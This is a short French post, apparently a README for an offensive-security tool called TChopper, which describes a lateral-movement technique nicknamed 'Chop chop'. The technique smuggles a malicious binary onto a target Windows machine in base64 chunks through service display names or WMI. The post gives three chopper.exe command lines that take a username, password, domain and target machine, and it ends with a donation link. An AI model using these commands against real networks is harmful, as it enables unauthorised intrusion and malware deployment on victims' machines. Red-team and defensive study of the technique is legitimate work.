
mener une attaque de mouvement latéral en exploitant le nom d'affichage des services non filtrés pour faire passer en contrebande des binaires sous forme de fragments dans la machine cible
Nouvelle technique que j'ai découverte récemment et à laquelle j'ai donné un surnom (Chop chop) pour effectuer un mouvement latéral en utilisant le nom d'affichage des services Windows et WMI en faisant passer le binaire malveillant sous forme de chunks base64 et en automatisant le processus à l'aide de l'outil TChopper.
image
Alors que si vous effectuez un mouvement latéral en utilisant la technique WMI, vous pouvez aussi utiliser Chopper pour cela
image
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
Je crée des outils offsec pour la communauté open-source, montrez votre soutien https://paypal.me/0xsp